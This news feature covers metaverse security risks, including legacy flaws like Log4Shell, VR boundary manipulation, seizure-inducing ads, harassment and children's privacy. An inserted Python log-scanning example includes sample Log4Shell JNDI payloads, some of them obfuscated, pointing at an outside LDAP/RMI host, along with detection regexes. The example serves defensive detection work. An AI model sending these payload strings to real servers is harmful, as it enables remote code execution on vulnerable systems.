As virtual worlds and augmented reality platforms develop into what their proponents call the "metaverse," users and businesses will face entirely new categories of security risks and pitfalls.
The concept of a 3D virtual environment where users can interact and socialize has existed for some time, but the metaverse was thrust to center stage last fall when Facebook rebranded as Meta and made a huge bet on bringing the technology to both consumers and enterprises; other technology companies have followed suit. Experts predict that as the metaverse develops, security flaws that most people have not even considered will become common risks.
Kavya Pearlman, CEO of the XR Security Initiative (XRSI), told SearchSecurity that, early on, many of the risks developers and companies face will be the same ones current websites and web applications already deal with.
"You can still exploit existing CVEs," Pearlman noted.
"All of that is going to come along because most of these things are running on the same protocol."
This, Pearlman explained, will mean that flaws like Log4Shell will remain a threat for metaverse platforms. Developers and administrators will need to take the same security precautions and countermeasures.
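One countermeasure that carries over unchanged is hunting request logs for Log4Shell (CVE-2021-44228) exploitation attempts. The Python below is an added example written for this page, not code from XRSI, Pearlman or any product: it collapses the lookup-nesting tricks attackers used to hide the `jndi:` string (`${lower:...}`, `${upper:...}` and the `${...:-...}` default-value form) and flags the lines that still contain a JNDI lookup afterwards. The log lines are constructed samples using documentation IP ranges.

```python
import re
from typing import Dict, List

# Constructed sample web-server access log lines (not from the article).
# The last quoted field is the User-Agent header, a common injection point.
SAMPLE_LOG: List[str] = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] "GET /login HTTP/1.1" 200 99 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:04 +0000] "GET /api HTTP/1.1" 200 10 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/c}"',
    '203.0.113.12 - - [10/Dec/2021:10:00:05 +0000] "GET /help HTTP/1.1" 200 10 "-" "curl/7.68.0 ${env:HOME}"',
]

# An innermost ${...} lookup: its content contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A de-obfuscated JNDI lookup, e.g. jndi:ldap://host:port/path
_JNDI = re.compile(r"jndi:([a-z]+)://([^\s\"}]+)", re.IGNORECASE)


def _resolve(token: str) -> str:
    """Evaluate one innermost Log4j lookup the way the vulnerable versions
    would, for the handful of forms used to hide 'jndi:'."""
    head = token.lower()
    if head.startswith("lower:"):
        return token[6:].lower()
    if head.startswith("upper:"):
        return token[6:].upper()
    if ":-" in token:                 # ${name:-default} -> default; ${::-x} -> x
        return token.split(":-", 1)[1]
    return "${" + token + "}"         # any other lookup is left untouched


def normalize_lookups(text: str, max_passes: int = 10) -> str:
    """Repeatedly collapse innermost lookups until nothing changes.
    max_passes bounds the work on pathological, deeply nested input."""
    for _ in range(max_passes):
        collapsed = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_log4shell(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per line that carries a JNDI lookup after
    de-obfuscation: line number, protocol, target host:port/path and the
    normalized line for the analyst."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize_lookups(line)
        match = _JNDI.search(normalized)
        if match:
            hits.append({
                "line": number,
                "protocol": match.group(1).lower(),
                "target": match.group(2),
                "normalized": normalized,
            })
    return hits


if __name__ == "__main__":
    for hit in find_log4shell(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['protocol']} -> {hit['target']}")
```

Lines 2, 3 and 4 of the sample are flagged (the plain payload and both obfuscated variants); line 5, which carries a harmless `${env:HOME}` lookup, is not. Spotting these strings in logs is a signal for incident response, not a fix: the countermeasure remains upgrading Log4j and blocking outbound LDAP and RMI from application servers.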
Stephanie Benoit-Kurtz, a lead faculty member at the University of Phoenix College of Information Systems and Technology, said that the extra hardware VR and augmented reality platforms require will also widen the exposure of corporate networks and give attackers a way to covertly pull data from virtual meetings and presentations.
"From VR headsets to other types of devices that augment the experiences, the infrastructure required to support this new environment is exponentially more extensive than what exists today," Benoit-Kurtz told SearchSecurity.
"The challenge with every endpoint is that bad actors will be looking for ways to exploit those endpoints either to take over identities on the network or block access through denial-of-service attacks."
Things could get physical
As the technology matures, however, different problems are likely to surface. In particular, attacks could move from the data realm into physical harm.
Pearlman's XRSI has produced proof-of-concept research showing how an attacker could manipulate a VR platform to reset the physical boundary the hardware enforces around the user. A user could, for example, be steered into furniture or toward a flight of stairs.
This could become even more dangerous once augmented reality enters the picture: users could be misdirected into a street or led into a dangerous situation, such as a robbery or mugging.
Even less pleasant is a hypothetical attack that could, quite literally, leave its victims sick to their stomachs.
"We know that in VR, people could experience motion sickness," Pearlman pointed out. "A creator could by intention embed something that, when you click it, makes you motion sick."
Other attacks could be even more sinister and harmful, said Christopher Boyd, senior threat researcher at Malwarebytes.
"A few years ago, one of the main routes to exploitation in virtual spaces was paid advertising. With plans to insert regular ad networks with dynamic ad spaces into games, it's reasonable to expect compromises and rogue ads," Boyd told SearchSecurity.
"Malicious individuals could have replaced regular ads with strobing images designed to trigger epileptic seizures, along the lines of similar attacks on epilepsy foundations on social media and forums generally."
The most dystopian possibility for the metaverse is the impact it could have on its users' mental health.
Most immediately, developers of virtual environments will have to address harassment.
"The primary current route to physical exploitation in VR spaces is sexual harassment and abuse, often helped along by weak or absent safety settings," Boyd explained.
"This has been a problem in virtual spaces for a long time, and plenty of options to combat it exist."
Other potential mental health issues will arise from long-term immersion in virtual worlds.
Pearlman, who was formerly head of security at Linden Lab, said that while working on the company's VR platform Sansar, she would experience what she calls "phantom timeline syndrome," in which the lines between the virtual world and the physical world became blurred.
"You are not able to distinguish reality from VR," Pearlman recounted. "You step out of VR and you still feel like whatever is around you is VR."
This, she said, will be a particular danger to children who grow up with the metaverse. With impressionable young minds spending large amounts of time on VR and AR platforms, Pearlman worries that attackers could use misinformation to manipulate children and imprint false beliefs.
There is also the danger of personal data theft. Because metaverse platforms can collect images and other personal details of their users, children would be exposed to further privacy violations.
"The concept of privacy becomes that much more concerning as you talk about children in this space," Benoit-Kurtz said. "Inevitably kids will be in this space, and the legacy Children's Online Privacy Protection Act (COPPA) is not sufficient to deal with the future of this technology or the adequate safeguards to deal with the exponential personal information that these environments will collect."
How to prepare
Both Pearlman and Benoit-Kurtz agreed that, in order to protect their data and their employees' privacy, companies will need more than just a few policy changes.
Enterprises will need to plan ahead for how they will ensure their AR and VR platforms are not abused, whether externally by attackers or internally by unethical managers intent on violating the privacy of their colleagues and subordinates.
"Adopting this type of technology by an organization is much bigger than IT and HR. This step into the metaverse will transform organizations significantly over the next five to 10 years," Benoit-Kurtz advised.
"Rather than waiting for the technology to be knocking on the door, organizations should take a proactive approach to the topic by starting to address the conversations at the organizational level now."